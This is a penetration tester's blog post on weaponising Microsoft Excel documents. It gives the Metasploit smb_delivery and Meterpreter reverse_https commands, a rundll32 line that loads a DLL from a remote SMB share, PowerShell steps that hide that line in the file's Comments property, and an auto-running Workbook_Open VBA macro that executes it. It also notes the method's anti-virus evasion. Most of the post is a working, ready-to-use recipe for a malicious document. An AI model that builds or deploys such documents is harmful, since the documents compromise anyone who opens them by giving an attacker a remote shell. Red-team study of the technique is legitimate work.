As a penetration tester I’m always excited to see new and creative methods on creating weaponized MS Office documents. This blog post builds on the following findings published by Black Hills InfoSec:
There are numerous ways on how MS Office documents can be abused and weaponised to deliver a variety of cyber-related attacks. This blog post will demonstrate how quickly and easy it is to hide a Metasploit and Empire payload within a MS Office document and execute it from an embedded Macro.
In the first example I’m going to use a payload generated with Metasploits ‘SMB Delivery’ functionality to Weaponise a MS Excel document. The ‘SMB Delivery’ is a personal favourite of mine given its simplicity and subtle anti-virus evasion.
Begin by loading the relevant module into Metasploit:
use exploit/windows/smb/smb_delivery
Set the payload to anything you desire, in this example I’ll be using the Windows Meterpreter Reverse HTTPS payload:
set PAYLOAD windows/meterpreter/reverse_https
Finally, issue the ‘exploit’ command to begin staging the attack:
Now, in order to utilise this, we will need execute the following command on the victim host:
rundll32.exe \\\PPuUdw\test.dll,0
Note: the folder path is randomly generated as we didn’t explicitly define it within the Metasploit options
In order to achieve this, we’re going to embed this command into a MS Excel document within the ‘comments’ property and execute it from an embedded Macro. This can easily be done by using the Powershell script: ‘Commentator’ (
Begin by starting PowerShell:
powershell.exe -exec bypass
Import the module into your PowerShell environment:
Import-Module .\Commentator.ps1
And execute the script to embed our payload into the ‘comments’ property of the MS Excel document:
Invoke-Commentator -OfficeFile .\msf_smb_delivery.xlsx -Comment "rundll32.exe \\\PPuUdw\test.dll,0"
After successful execution, a copy of your existing MS Office file will be created with the payload embedded:
The new file with added comment has been written to .\msf_smb_delivery-wlc.xlsx.
This can be verified by inspecting the file’s metadata / properties:
Lastly, in order to execute the payload embedded within the ‘comments’ property, the following embedded Macro can be used:
Sub Workbook_Open() Dim p As DocumentProperty For Each p In ActiveWorkbook.BuiltinDocumentProperties If p.Name = "Comments" Then Shell (p.Value) End If Next End Sub
Note: In order to utilise auto-execution via the ‘Workbook_Open()’ function, the weaponised MS Excel document needed to be downgraded to Office 98 – 2003 compatibility (.xls)
After the victim has clicked ‘enable editing’ and ‘enable content’, a Meterpreter session should appear: